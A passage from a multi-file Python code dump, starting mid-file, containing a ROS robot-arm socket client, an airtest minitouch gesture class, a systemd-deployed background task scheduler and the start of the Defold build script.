            pf.panel.set_title(popts['title'], delay_draw=True)
            pf.panel.set_xlabel(popts['xlabel'], delay_draw=True)
            if len(_y.shape) == 2 and _y.shape[1] == 3:
                pf.update_line(0, _x, _y[:, 0], update_limits=True, draw=False)
                pf.update_line(1, _x, _y[:, 1], update_limits=True, draw=False)
                pf.update_line(2, _x, _y[:, 2], update_limits=True, draw=True)
            else:
                pf.update_line(0, _x, _y, update_limits=True, draw=True)
        pf.Show()
        self.SetFocus()
        try:
            self.parent.Raise()
        except:
            pass
|
HiwinRA605_socket_ros_20190604112000.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0'              # initial value of the outgoing socket payload string
Arm_feedback = 1        # assume the arm starts out busy
state_feedback = 0      # last reply from the 'arm_state' service
NAME = 'socket_server'  # ROS node name
client_response = 0     # running count of pose packets received from the client
##------------class pos-------
class pos():
    """Mutable pose container: Cartesian position plus Euler angles.

    Also used as a class-level namespace by the service handlers.
    """
    def __init__(self, x, y, z, pitch, roll, yaw):
        for name, value in zip(('x', 'y', 'z', 'pitch', 'roll', 'yaw'),
                               (x, y, z, pitch, roll, yaw)):
            setattr(self, name, value)
##------------class socket_cmd---------
class socket_cmd():
    """Holds the latest motion-command parameters from the strategy node.

    Also used as a class-level namespace by the service handlers.
    """
    def __init__(self, grip, setvel, ra, delay, setboth, action):
        fields = dict(grip=grip, setvel=setvel, ra=ra,
                      delay=delay, setboth=setboth, action=action)
        self.__dict__.update(fields)
##-----------switch define------------##
class switch(object):
    """Tiny switch/case emulation (ActiveState recipe).

    Iterating yields a single match() predicate; once a case matches
    (or a bare case() is used) fall-through is enabled.
    """
    def __init__(self, value):
        self.value = value
        self.fall = False

    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # fix: the original `raise StopIteration` inside a generator becomes
        # RuntimeError under PEP 479 (Python 3.7+); a plain return ends the
        # iteration correctly.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args: # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Forward the arm busy/ready state to the 'arm_state' ROS service.

    Blocks until the service is available; returns the service response,
    or None if the call raised (the error is printed).
    NOTE(review): the global is rebound to the raw response object, not an
    unpacked field -- confirm callers expect that.
    """
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = Arm_state_client(Arm_state)
        #pos_feedback_times = pos_feedback.response
        return state_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ## service handler: receive a pose from the strategy node
    """Copy the client's pose fields (as strings) onto the shared pos class.

    Returns the running count of pose packets received.
    """
    global client_response
    for field in ('x', 'y', 'z', 'pitch', 'roll', 'yaw'):
        setattr(pos, field, '%s' % getattr(req, field))
    client_response = client_response + 1
    return client_response
##----------Arm Mode-------------###
def Arm_Mode(req): ## service handler: receive arm-mode data from the strategy node
    """Copy the client's arm-mode fields (as ints) onto socket_cmd; return 1."""
    field_map = (('action', req.action), ('grip', req.grip), ('ra', req.ra),
                 ('setvel', req.vel), ('setboth', req.both))
    for name, raw in field_map:
        setattr(socket_cmd, name, int('%s' % raw))
    return 1
def socket_server(): ## create the ROS server node
    """Register the arm_mode/arm_pos services and spin until shutdown."""
    rospy.init_node(NAME)
    a = rospy.Service('arm_mode',arm_mode, Arm_Mode)  ## serve arm mode data
    s = rospy.Service('arm_pos',arm_data, point_data)  ## serve arm point data
    print ("Ready to connect")
    rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
##-----------socket client--------
def socket_client():
    """Connect to the arm controller over TCP and stream motion commands.

    Loops forever: packs the current globals (``socket_cmd``/``pos``) into the
    TCP wire format via ``TCP.Set*``, sends the command, then relays the arm's
    busy/ready state back through the ROS 'arm_state' service.
    """
    global Arm_feedback, data
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.0.1', 8080))  # iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))  # iclab computerx
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    print('Connection has been successful')
    print(s.recv(1024))
    # Prompt (Chinese): press 1 to start transmitting, 3 to quit.
    start_input = int(input('開始傳輸請按1,離開請按3 : '))
    #start_input = 1
    if start_input == 1:
        while 1:
            ##--------------- send arm command over socket -----------------
            #------- select mode --------
            for case in switch(socket_cmd.action):
                #------- PtP --------
                if case(Taskcmd.Action_Type.PtoP):
                    for case in switch(socket_cmd.setboth):
                        if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                            data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_POS, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel)
                            break
                        if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                            data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_EULER, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel)
                            break
                        if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                            data = TCP.SetPtoP(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_BOTH, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel)
                            break
                    break
                #------- Line Mode --------
                if case(Taskcmd.Action_Type.Line):
                    for case in switch(socket_cmd.setboth):
                        if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                            data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_POS, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel)
                            break
                        if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                            data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_EULER, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel )
                            break
                        if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                            data = TCP.SetLine(socket_cmd.grip, Taskcmd.RA.ABS, Taskcmd.Ctrl_Mode.CTRL_BOTH, pos.x, pos.y, pos.z, pos.pitch, pos.roll, pos.yaw, socket_cmd.setvel )
                            break
                    break
                if case(Taskcmd.Action_Type.SetVel):
                    data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                    break
                if case(Taskcmd.Action_Type.Delay):
                    data = TCP.SetDelay(socket_cmd.grip, 0)
                    break
                if case(Taskcmd.Action_Type.Mode):
                    data = TCP.SetMode(socket_cmd.grip, 0)
                    break
            socket_cmd.action = 5  ## reset to the idle mode state
            s.send(data.encode('utf-8'))  # socket send; encode str for transmission
            feedback_str = s.recv(1024)
            # Arm side reports its state (byte 2 of the reply):
            if str(feedback_str[2]) == '70':  # 'F': arm is Ready, can accept the next motion command
                feedback = 0
                socket_client_arm_state(feedback)
                print("isbusy false")
            if str(feedback_str[2]) == '84':  # 'T': arm is busy, cannot run the next motion command
                feedback = 1
                socket_client_arm_state(feedback)
                print("isbusy true")
            if str(feedback_str[2]) == '54':  # '6': strategy finished
                feedback = 6
                socket_client_arm_state(feedback)
                print("shutdown")
            #Arm_feedback = TCP.Is_busy(feedback)
            ##--------------- send arm command over socket end -----------------
            if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
                rospy.on_shutdown(myhook)
                break
    if start_input == 3:
        pass
    s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
    """Thread entry point: run the blocking TCP client loop."""
    socket_client()
## 多執行序 end
def myhook():
    """rospy shutdown callback: announce that the node is going down."""
    print("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  ## switch to the initial mode state
    # Run the TCP client in a background thread while the ROS services spin
    # in the main thread.
    t = threading.Thread(target=thread_test)
    t.start()  # start multithreading
    socket_server()
    t.join()
# Editor shortcuts (VS Code):
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
base_touch.py | # -*- coding: utf-8 -*-
import threading
import time
import six
from six.moves import queue
from airtest.utils.logger import get_logger
from airtest.utils.snippet import (on_method_ready, ready_method, reg_cleanup)
LOGGING = get_logger(__name__)
class BaseTouch(object):
    """
    A super class for Minitouch or Maxtouch
    """

    def __init__(self, adb, backend=False, ori_function=None, input_event=None):
        self.adb = adb
        self.backend = backend
        self.server_proc = None
        self.client = None
        self.size_info = None
        self.input_event = input_event
        self.handle = None
        # Fall back to adb's physical display info when no (callable)
        # orientation function is supplied.
        self.ori_function = ori_function if callable(ori_function) else self.adb.getPhysicalDisplayInfo
        self.default_pressure = 50
        self.path_in_android = ""
        reg_cleanup(self.teardown)

    @ready_method
    def install_and_setup(self):
        """
        Install and setup airtest touch

        Returns:
            None

        """
        self.install()
        self.size_info = self.ori_function()
        self.setup_server()
        if self.backend:
            self.setup_client_backend()
        else:
            self.setup_client()

    def uninstall(self):
        """
        Uninstall airtest touch

        Returns:
            None

        """
        # BUGFIX: was `raise NotImplemented`, which raises a TypeError because
        # NotImplemented is a sentinel value, not an exception class.
        raise NotImplementedError

    def install(self):
        """
        Install airtest touch

        Returns:
            None

        """
        raise NotImplementedError

    def setup_server(self):
        """
        Setup touch server and adb forward

        Returns:
            server process

        """
        raise NotImplementedError

    def safe_send(self, data):
        """
        Send data to client

        Args:
            data: data to send

        Raises:
            Exception: when data cannot be sent

        Returns:
            None

        """
        if isinstance(data, six.text_type):
            data = data.encode('utf-8')
        try:
            self.client.send(data)
        except Exception as err:
            # raise MinitouchError(err)
            raise err

    def _backend_worker(self):
        """
        Backend worker queue thread

        Returns:
            None

        """
        # `isSet` is a deprecated alias of `is_set`.
        while not self.backend_stop_event.is_set():
            cmd = self.backend_queue.get()
            if cmd is None:
                break
            self.safe_send(cmd)

    def setup_client_backend(self):
        """
        Setup backend client thread as daemon

        Returns:
            None

        """
        self.backend_queue = queue.Queue()
        self.backend_stop_event = threading.Event()
        self.setup_client()
        t = threading.Thread(target=self._backend_worker, name="airtouch")
        # t.daemon = True
        t.start()
        self.backend_thread = t
        # In backend mode commands are queued instead of sent directly.
        self.handle = self.backend_queue.put

    def setup_client(self):
        """
        Setup client

        Returns:
            None

        """
        raise NotImplementedError

    def teardown(self):
        """
        Stop the server and client

        Returns:
            None

        """
        if hasattr(self, "backend_stop_event"):
            self.backend_stop_event.set()
            # A None item unblocks and terminates _backend_worker.
            self.backend_queue.put(None)
        if self.client:
            self.client.close()
        if self.server_proc:
            self.server_proc.kill()

    def transform_xy(self, x, y):
        """
        Transform coordinates (x, y) according to the device display

        Args:
            x: coordinate x
            y: coordinate y

        Returns:
            transformed coordinates (x, y)

        """
        return x, y

    @on_method_ready('install_and_setup')
    def perform(self, motion_events, interval=0.01):
        """
        Perform a sequence of motion events including: UpEvent, DownEvent, MoveEvent, SleepEvent

        Args:
            motion_events: a list of MotionEvent instances
            interval: minimum interval between events

        Returns:
            None

        """
        for event in motion_events:
            if isinstance(event, SleepEvent):
                time.sleep(event.seconds)
            else:
                cmd = event.getcmd(transform=self.transform_xy)
                self.handle(cmd)
                time.sleep(interval)

    @on_method_ready('install_and_setup')
    def touch(self, tuple_xy, duration=0.01):
        """
        Perform touch event

        minitouch protocol example::

            d 0 10 10 50
            c
            <wait in your own code>
            u 0
            c

        Args:
            tuple_xy: coordinates (x, y)
            duration: time interval for touch event, default is 0.01

        Returns:
            None

        """
        touch_events = [DownEvent(tuple_xy, pressure=self.default_pressure), SleepEvent(duration), UpEvent()]
        self.perform(touch_events)

    def __swipe_move(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
        """
        Return a sequence of swipe motion events (only MoveEvent)

        minitouch protocol example::

            d 0 0 0 50
            c
            m 0 20 0 50
            c
            m 0 40 0 50
            c
            m 0 60 0 50
            c
            m 0 80 0 50
            c
            m 0 100 0 50
            c
            u 0
            c

        Args:
            tuple_from_xy: start point
            tuple_to_xy: end point
            duration: time interval for swipe duration, default is 0.8
            steps: size of swipe step, default is 5

        Returns:
            [MoveEvent(from_x, from_y), ..., MoveEvent(to_x, to_y)]

        """
        from_x, from_y = tuple_from_xy
        to_x, to_y = tuple_to_xy
        ret = []
        interval = float(duration) / (steps + 1)
        # Intermediate points along the straight line; the final point is
        # appended explicitly below so it is always reached exactly.
        for i in range(1, steps):
            ret.append(MoveEvent((from_x + (to_x - from_x) * i / steps,
                                  from_y + (to_y - from_y) * i / steps)))
            ret.append(SleepEvent(interval))
        ret += [MoveEvent((to_x, to_y), pressure=self.default_pressure), SleepEvent(interval)]
        return ret

    @on_method_ready('install_and_setup')
    def swipe_along(self, coordinates_list, duration=0.8, steps=5):
        """
        Perform swipe event across multiple points in sequence.

        Args:
            coordinates_list: list of coordinates: [(x1, y1), (x2, y2), (x3, y3)]
            duration: time interval for swipe duration, default is 0.8
            steps: size of swipe step, default is 5

        Returns:
            None

        """
        tuple_from_xy = coordinates_list[0]
        swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
        for tuple_to_xy in coordinates_list[1:]:
            swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
            tuple_from_xy = tuple_to_xy
        swipe_events.append(UpEvent())
        self.perform(swipe_events)

    @on_method_ready('install_and_setup')
    def swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5):
        """
        Perform swipe event.

        Args:
            tuple_from_xy: start point
            tuple_to_xy: end point
            duration: time interval for swipe duration, default is 0.8
            steps: size of swipe step, default is 5

        Returns:
            None

        """
        swipe_events = [DownEvent(tuple_from_xy, pressure=self.default_pressure), SleepEvent(0.1)]
        swipe_events += self.__swipe_move(tuple_from_xy, tuple_to_xy, duration=duration, steps=steps)
        swipe_events.append(UpEvent())
        self.perform(swipe_events)

    @on_method_ready('install_and_setup')
    def two_finger_swipe(self, tuple_from_xy, tuple_to_xy, duration=0.8, steps=5, offset=(0, 50)):
        """
        Perform two finger swipe action

        minitouch protocol example::

            d 0 0 0 50
            d 1 1 0 50
            c
            m 0 20 0 50
            m 1 21 0 50
            c
            m 0 40 0 50
            m 1 41 0 50
            c
            m 0 60 0 50
            m 1 61 0 50
            c
            m 0 80 0 50
            m 1 81 0 50
            c
            m 0 100 0 50
            m 1 101 0 50
            c
            u 0
            u 1
            c

        Args:
            tuple_from_xy: start point
            tuple_to_xy: end point
            duration: time interval for swipe duration, default is 0.8
            steps: size of swipe step, default is 5
            offset: coordinate offset of the second finger, default is (0, 50)

        Returns:
            None

        """
        from_x, from_y = tuple_from_xy
        to_x, to_y = tuple_to_xy
        # Compute the second finger's coordinates from the offset, clamped
        # to the display bounds.
        from_x2, from_y2 = (min(max(0, from_x + offset[0]), self.size_info['width']),
                            min(max(0, from_y + offset[1]), self.size_info['height']))
        to_x2, to_y2 = (min(max(0, to_x + offset[0]), self.size_info['width']),
                        min(max(0, to_y + offset[1]), self.size_info['height']))
        swipe_events = [DownEvent(tuple_from_xy, contact=0, pressure=self.default_pressure),
                        DownEvent((from_x2, from_y2), contact=1, pressure=self.default_pressure),
                        ]
        interval = float(duration) / (steps + 1)
        for i in range(1, steps + 1):
            move_events = [
                SleepEvent(interval),
                MoveEvent((from_x + ((to_x - from_x) * i / steps), from_y + (to_y - from_y) * i / steps),
                          contact=0, pressure=self.default_pressure),
                MoveEvent((from_x2 + (to_x2 - from_x2) * i / steps, from_y2 + (to_y2 - from_y2) * i / steps),
                          contact=1, pressure=self.default_pressure),
            ]
            swipe_events.extend(move_events)
        swipe_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
        self.perform(swipe_events)

    @on_method_ready('install_and_setup')
    def pinch(self, center=None, percent=0.5, duration=0.5, steps=5, in_or_out='in'):
        """
        Perform pinch action

        minitouch protocol example::

            d 0 0 100 50
            d 1 100 0 50
            c
            m 0 10 90 50
            m 1 90 10 50
            c
            m 0 20 80 50
            m 1 80 20 50
            c
            m 0 20 80 50
            m 1 80 20 50
            c
            m 0 30 70 50
            m 1 70 30 50
            c
            m 0 40 60 50
            m 1 60 40 50
            c
            m 0 50 50 50
            m 1 50 50 50
            c
            u 0
            u 1
            c

        Args:
            center: the center point of the pinch operation
            percent: pinch distance to half of screen, default is 0.5
            duration: time interval for swipe duration, default is 0.8
            steps: size of swipe step, default is 5
            in_or_out: pinch in or pinch out, default is 'in'

        Returns:
            None

        Raises:
            TypeError: An error occurred when center is not a list/tuple or None

        """
        w, h = self.size_info['width'], self.size_info['height']
        if isinstance(center, (list, tuple)):
            x0, y0 = center
        elif center is None:
            x0, y0 = w / 2, h / 2
        else:
            raise TypeError("center should be None or list/tuple, not %s" % repr(center))

        x1, y1 = x0 - w * percent / 2, y0 - h * percent / 2
        x2, y2 = x0 + w * percent / 2, y0 + h * percent / 2
        pinch_events = []
        interval = float(duration) / (steps + 1)
        # Choose the start/end coordinates of both fingers depending on
        # whether this is a pinch-in or a pinch-out.
        if in_or_out == 'in':
            start_pos1_x, start_pos1_y = x1, y1
            start_pos2_x, start_pos2_y = x2, y2
            end_pos1_x, end_pos1_y = x0, y0
            end_pos2_x, end_pos2_y = x0, y0
        else:
            start_pos1_x, start_pos1_y = x0, y0
            start_pos2_x, start_pos2_y = x0, y0
            end_pos1_x, end_pos1_y = x1, y1
            end_pos2_x, end_pos2_y = x2, y2
        # Build the pinch gesture: both fingers down, interpolated moves,
        # then both fingers up.
        pinch_events.extend([
            DownEvent((start_pos1_x, start_pos1_y), contact=0, pressure=self.default_pressure),
            DownEvent((start_pos2_x, start_pos2_y), contact=1, pressure=self.default_pressure)
        ])
        for i in range(1, steps):
            pinch_events.extend([
                SleepEvent(interval),
                MoveEvent((start_pos1_x + (end_pos1_x - start_pos1_x) * i / steps,
                           start_pos1_y + (end_pos1_y - start_pos1_y) * i / steps),
                          contact=0, pressure=self.default_pressure),
                MoveEvent((start_pos2_x + (end_pos2_x - start_pos2_x) * i / steps,
                           start_pos2_y + (end_pos2_y - start_pos2_y) * i / steps),
                          contact=1, pressure=self.default_pressure)
            ])
        pinch_events.extend([
            SleepEvent(interval),
            MoveEvent((end_pos1_x, end_pos1_y), contact=0, pressure=self.default_pressure),
            MoveEvent((end_pos2_x, end_pos2_y), contact=1, pressure=self.default_pressure)
        ])
        pinch_events.extend([UpEvent(contact=0), UpEvent(contact=1)])
        self.perform(pinch_events)

    @on_method_ready('install_and_setup')
    def operate(self, args):
        """
        Perform down, up and move actions

        Args:
            args: action arguments, dictionary containing type and x, y coordinates, e.g.::

                  {
                  "type" : "down",
                  "x" : 10,
                  "y" : 10
                  }

        Raises:
            RuntimeError: is invalid arguments are provided

        Returns:
            None

        """
        if args["type"] == "down":
            x, y = self.transform_xy(args["x"], args["y"])
            cmd = "d 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
        elif args["type"] == "move":
            x, y = self.transform_xy(args["x"], args["y"])
            cmd = "m 0 {x} {y} {pressure}\nc\n".format(x=x, y=y, pressure=self.default_pressure)
        elif args["type"] == "up":
            cmd = "u 0\nc\n"
        else:
            raise RuntimeError("invalid operate args: {}".format(args))
        self.handle(cmd)
class MotionEvent(object):
    """Base class for motion events performed by Minitouch/Maxtouch."""

    def getcmd(self, transform=None):
        """Return the protocol command string; subclasses must override."""
        raise NotImplementedError
class DownEvent(MotionEvent):
    """Finger-down event at given coordinates.

    :param coordinates: finger down coordinates in (x, y)
    :param contact: multi-touch action, starts from 0
    :param pressure: touch pressure
    """

    def __init__(self, coordinates, contact=0, pressure=50):
        super(DownEvent, self).__init__()
        self.coordinates = coordinates
        self.contact = contact
        self.pressure = pressure

    def getcmd(self, transform=None):
        # Apply the optional coordinate transform before formatting.
        x, y = transform(*self.coordinates) if transform else self.coordinates
        return "d {contact} {x} {y} {pressure}\nc\n".format(
            contact=self.contact, x=x, y=y, pressure=self.pressure)
class UpEvent(MotionEvent):
    """Finger-up event for a given contact (multi-touch slot).

    :param contact: multi-touch action, starts from 0
    """

    def __init__(self, contact=0):
        super(UpEvent, self).__init__()
        self.contact = contact

    def getcmd(self, transform=None):
        # `transform` is accepted for interface symmetry but unused: an up
        # event carries no coordinates.
        return "u {:.0f}\nc\n".format(self.contact)
class MoveEvent(MotionEvent):
    """Finger-move event to the given coordinates.

    :param coordinates: finger move to coordinates in (x, y)
    :param contact: multi-touch action, starts from 0
    :param pressure: touch pressure
    """

    def __init__(self, coordinates, contact=0, pressure=50):
        super(MoveEvent, self).__init__()
        self.coordinates = coordinates
        self.contact = contact
        self.pressure = pressure

    def getcmd(self, transform=None):
        # Apply the optional coordinate transform before formatting.
        x, y = transform(*self.coordinates) if transform else self.coordinates
        return "m {contact} {x} {y} {pressure}\nc\n".format(
            contact=self.contact, x=x, y=y, pressure=self.pressure)
class SleepEvent(MotionEvent):
    """Pause between motion events; produces no protocol command."""

    def __init__(self, seconds):
        self.seconds = seconds

    def getcmd(self, transform=None):
        return None
|
bg.py | # -*- encoding:utf-8 -*-
import os
import io
import sys
import json
import importlib
import traceback
import threading
import zen
import zen.tbw
import zen.misc
import zen.biom
import zen.task
# Event set by signal handlers to stop the main sleep/report loop in start().
RELEASE = threading.Event()
# Latest result (or error repr) of each background task, keyed by task name.
REPORT = {}
def setInterval(interval):
    """Decorator factory: run the decorated function every `interval` seconds.

    Calling the wrapped function starts a daemon thread that repeatedly
    invokes the original and returns a threading.Event; setting that event
    stops the loop.
    """
    def decorator(function):
        """Main decorator function."""
        def wrapper(*args, **kwargs):
            """Helper function to create thread."""
            stop_event = threading.Event()

            def _loop():
                """Thread entry point."""
                # Event.wait doubles as the sleep; a set event ends the loop.
                while not stop_event.wait(interval):
                    function(*args, **kwargs)

            worker = threading.Thread(target=_loop)
            worker.daemon = True  # stop if the program exits
            worker.start()
            return stop_event
        return wrapper
    return decorator
def deploy():
    """Install this module as the systemd service `bg` and launch it.

    Writes a unit file for the current user/python environment, moves it to
    /etc/systemd/system (requires sudo), reloads systemd and (re)starts the
    service.
    """
    normpath = os.path.normpath
    with io.open("./bg.service", "w") as unit:
        unit.write(u"""[Unit]
Description=Zen bg tasks
After=network.target
[Service]
User=%(usr)s
WorkingDirectory=%(wkd)s
Environment=PYTHONPATH=%(path)s
ExecStart=%(exe)s %(mod)s
Restart=always
[Install]
WantedBy=multi-user.target
""" % {
            "usr": os.environ.get("USER", "unknown"),
            "wkd": normpath(sys.prefix),
            "path": normpath(os.path.dirname(__file__)),
            "mod": normpath(os.path.abspath(__file__)),
            "exe": normpath(sys.executable)
        })
    os.system("chmod +x ./bg.service")
    os.system("sudo mv --force ./bg.service /etc/systemd/system")
    os.system("sudo systemctl daemon-reload")
    # BUGFIX: os.system returns the command's exit status (0 == success).
    # The original `if not os.system(...restart...)` ran the `start` fallback
    # only when the restart had already succeeded; fall back on failure instead.
    if os.system("sudo systemctl restart bg"):
        os.system("sudo systemctl start bg")
def _launcher(func):
    """Execute a task callable once, storing its outcome in the global REPORT.

    On failure the exception is logged and its repr recorded instead of the
    result, so one failing task never kills the scheduler thread.
    """
    name = func.__name__
    try:
        result = func()
    except Exception as error:
        zen.logMsg(
            "%s exception:\n%r\n%s" %
            (name, error, traceback.format_exc())
        )
        result = "%r" % error
    REPORT[name] = result
def start():
    """Schedule every enabled task from root.json, then sleep/report in a
    loop until RELEASE is set; finally stop all task daemons."""
    info = zen.loadJson("root.json")
    tasks = info.get("tasks-enabled", {})
    # Default sleep: blocktime * activeDelegates (one full delegate round).
    sleep_time = info.get(
        "sleep-time",
        zen.tbw.rest.cfg.blocktime * zen.tbw.rest.cfg.activeDelegates
    )
    daemons = []
    for task, params in tasks.items():
        func = getattr(zen.task, task)
        if callable(func):
            # Wrap each task in _launcher (error capture) and fire it every
            # params["interval"] seconds; keep the stop-event for shutdown.
            daemons.append(setInterval(params["interval"])(_launcher)(func))
            zen.logMsg(
                "%s daemon set: interval=%ss" % (task, params["interval"])
            )
    # NOTE(review): zen.task is reloaded after the daemons already captured
    # their function objects — confirm this ordering is intended.
    importlib.reload(zen.task)
    RELEASE.clear()
    while not RELEASE.is_set():
        RELEASE.wait(timeout=float(sleep_time))
        zen.logMsg(
            "Sleep time finished :\n%s" % json.dumps(REPORT, indent=2)
        )
    # Signal every periodic task thread to stop.
    for daemon in daemons:
        daemon.set()
if __name__ == "__main__":
    import signal

    def exit_handler(*args, **kwargs):
        # Stop the start() loop, push delegate keys back and notify.
        RELEASE.set()
        zen.biom.pushBackKeys()
        zen.logMsg("Background tasks stopped !")
        zen.misc.notify("Background tasks stopped !")

    def show_hidden(*args, **kwargs):
        # Summarize which private keys are currently loaded: zen.biom stores
        # them as module attributes whose names contain '#'.
        report = {}
        for key, value in [
            (k, v) for k, v in zen.biom.__dict__.items() if "#" in k
        ]:
            username, num = key.replace("_", "").split("#")
            if value is not None:
                report[username] = report.get(username, []) + ["puk#" + num]
        msg = "Loaded private keys = %s" % json.dumps(report)
        zen.logMsg(msg)
        zen.misc.notify(msg)

    signal.signal(signal.SIGTERM, exit_handler)
    # SIGUSR1 is not available on Windows.
    if "win" not in sys.platform:
        signal.signal(signal.SIGUSR1, show_hidden)
    zen.logMsg("Background tasks started !")
    zen.misc.notify("Background tasks started !")
    try:
        zen.biom.pullKeys()
        start()
    except KeyboardInterrupt:
        exit_handler()
|
build.py | #!/usr/bin/env python
# Copyright 2020 The Defold Foundation
# Licensed under the Defold License version 1.0 (the "License"); you may not use
# this file except in compliance with the License.
#
# You may obtain a copy of the License, together with FAQs at
# https://www.defold.com/license
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# add build_tools folder to the import search path
import sys, os
from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath
sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools"))
import shutil, zipfile, re, itertools, json, platform, math, mimetypes
import optparse, subprocess, urllib, urlparse, tempfile, time
import imp
import github
import run
import s3
import release_to_github
import BuildUtility
import http_cache
from tarfile import TarFile
from glob import glob
from threading import Thread, Event
from Queue import Queue
from ConfigParser import ConfigParser
# Platforms supported by the public build; build_private may extend this list.
BASE_PLATFORMS = [ 'x86_64-linux',
                   'x86_64-darwin',
                   'win32', 'x86_64-win32',
                   'x86_64-ios', 'armv7-darwin', 'arm64-darwin',
                   'armv7-android', 'arm64-android',
                   'js-web', 'wasm-web']
# Optionally pull in proprietary platform support; if the build_private
# module is absent (or fails to import), fall back to a stub that adds
# nothing. (Python 2 `except Exception, e` syntax — this file targets py2.)
try:
    sys.path.insert(0, os.path.dirname(__file__))
    sys.dont_write_bytecode = True
    import build_private
except Exception, e:
    class build_private(object):
        @classmethod
        def get_target_platforms(cls):
            # No extra target platforms in the public build.
            return []
        @classmethod
        def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host
            return []
        @classmethod
        def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the target platform
            return []
        @classmethod
        def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform
            pass
        @classmethod
        def is_library_supported(cls, platform, library):
            return True
finally:
    sys.dont_write_bytecode = False
def get_target_platforms():
    """Return all buildable target platforms, public plus private ones."""
    return BASE_PLATFORMS + build_private.get_target_platforms()
# Prebuilt third-party package sets, unpacked into DYNAMO_HOME/ext.
PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 PVRTexLib-4.18.0 webp-0.5.0 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.6 c-ares-1.16.1 vulkan-1.1.108".split()
PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 webp-0.5.0 luajit-2.1.0-beta3 tremolo-0.0.8".split()
PACKAGES_EGGS="protobuf-2.3.0-py2.5.egg pyglet-1.1.3-py2.5.egg gdata-2.0.6-py2.6.egg Jinja2-2.6-py2.6.egg Markdown-2.6.7-py2.7.egg".split()
# Per-target-platform package sets.
PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split()
PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1".split()
PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 c-ares-1.16.1 MoltenVK-1.0.41".split()
PACKAGES_DARWIN="protobuf-2.3.0 PVRTexLib-4.18.0 webp-0.5.0 vpx-1.7.0".split()
